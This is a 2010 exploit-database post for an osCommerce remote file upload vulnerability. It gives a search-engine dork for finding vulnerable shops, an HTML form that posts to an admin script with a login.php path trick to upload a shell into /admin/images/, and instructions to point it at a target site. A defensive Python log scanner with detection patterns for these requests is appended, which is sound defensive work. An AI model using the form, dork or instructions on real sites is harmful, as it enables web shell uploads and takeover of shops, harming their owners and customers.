[webapps / 0day] - Oscommerce (script) /images/ Remote File
Posted on 30 November 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Oscommerce (script) /images/ Remote File Upload Vulnerability | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Oscommerce (script) /images/ Remote File Upload Vulnerability by Hackeri-AL in webapps / 0day | Inj3ct0r 1337 - exploit database : vulnerability : 0day : shellcode' /></head><body><pre>
=============================================================
Oscommerce (script) /images/ Remote File Upload Vulnerability
=============================================================

#################################################################
Author   : Hackeri-AL
Contact  : h-al [at] hotmail [dot] it
Greetz   : 1337db.com, LoocK3D & b4cKd00r ~ & GHoST61 & BaDBoy
My Group : UAH-Crew = United Albania Hackers
#################################################################

[~] DORK: inurl:"powered by oscommerce" or inurl:index.php?cPath=
-----------------------------------------------------------------
[~] script By Hackeri-AL :
-----------------------------------------------------------------
<html>
<head>
<title>By Hackeri-AL</title>
</head>
<body>
<div style="text-align: center;"><big style="color: rgb(253, 0, 0);"><big><big>Powered By Hackeri-AL<br>
</big></big></big><span style="color: rgb(102, 102, 102);"><br>
(best defacer United Albania Hackers)</span><br>
</div>
<big style="font-weight: bold; color: rgb(253, 0, 0);"><big><br>
Oscommerce script : Remote File Upload in /images/</big></big><br>
<form name="new_product" action="http://WEB.COM/admin/categories.php/login.php?cPath=&action=new_product_preview" method="post" enctype="multipart/form-data"><br>
<input name="products_image" type="file"><br>
<input name="submit" value=" Save " type="submit"><br>
<big style="font-weight: bold; color: rgb(253, 0, 0);"><big><br>
shell here:</big></big><br>
Using upload File : <a href=http://WEB.COM/admin/images/product_info.php>site/</>ath</>/images/product_info.php</a></font></body></form>
</body>
</html>
-----------------------------------------------------------------
Explanation :
-----------------------------------------------------------------
Find in script :
action="http://WEB.COM/admin/categories.php/login.php?cPath=&action=new_product_preview"

and change WEB.COM to the site where the shell will be uploaded.

Then find :

Using upload File : <a href=http://WEB.COM/admin/images/product_info.php>site/</>ath</>/images/product_info.php</a>

and change WEB.COM to the site where the shell will be uploaded.

####################################################################
[~] Proud 2 be Albania
[~] Proud 2 be Muslim
[~] United States of Albania
####################################################################
# <a href='http://1337db.com/'>1337db.com</a> [2010-11-30]</pre></body></html>
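For defenders, the two request shapes in the advisory above (an admin script addressed with a trailing /login.php path segment, and a PHP file fetched from an images directory) can be looked for in web server access logs. The following is an added example, not code from the original advisory or from osCommerce; the rule names, function names and log lines are constructed for illustration and assume the common/combined access log format.

```python
import re
from urllib.parse import urlsplit, unquote

# Request field of a common/combined log line: "METHOD target HTTP/x.y" status
REQ = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# An admin .php script followed by extra path info that ends in login.php
ADMIN_PATHINFO = re.compile(r'/admin/(?:[^/]+/)*[^/]+\.php/(?:.*/)?login\.php$', re.I)
# Any PHP-family file requested from an images directory
PHP_IN_IMAGES = re.compile(r'/images/(?:[^/]+/)*[^/]+\.(?:php\d?|phtml|phar)$', re.I)


def classify(line):
    """Return (rule, method, path, status) for a suspicious line, else None."""
    m = REQ.search(line)
    if not m:
        return None
    # Drop the query string and decode %-escapes so encoded dots still match
    path = unquote(urlsplit(m.group("target")).path)
    status = int(m.group("status"))
    if ADMIN_PATHINFO.search(path):
        return ("admin-pathinfo-login", m.group("method"), path, status)
    if PHP_IN_IMAGES.search(path):
        return ("php-under-images", m.group("method"), path, status)
    return None


def scan(lines):
    """Classify every line and keep only the hits, in log order."""
    return [hit for hit in map(classify, lines) if hit]


# Constructed sample lines (documentation addresses, not real traffic)
SAMPLE_LOG = [
    '198.51.100.7 - - [30/Nov/2010:10:01:02 +0000] "GET /index.php?cPath=3 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [30/Nov/2010:10:01:09 +0000] "POST /admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 200 8841',
    '198.51.100.7 - - [30/Nov/2010:10:01:15 +0000] "GET /admin/images/product_info.php HTTP/1.1" 200 312',
    '203.0.113.20 - - [30/Nov/2010:10:02:00 +0000] "GET /admin/login.php HTTP/1.1" 200 2048',
    '203.0.113.20 - - [30/Nov/2010:10:02:05 +0000] "GET /images/logo.png HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    for rule, method, path, status in scan(SAMPLE_LOG):
        print(f"{rule:22} {method:5} {status} {path}")
```

A 200 status on a php-under-images hit means the server answered for a script inside an upload directory; disabling script execution in that directory is the matching hardening step.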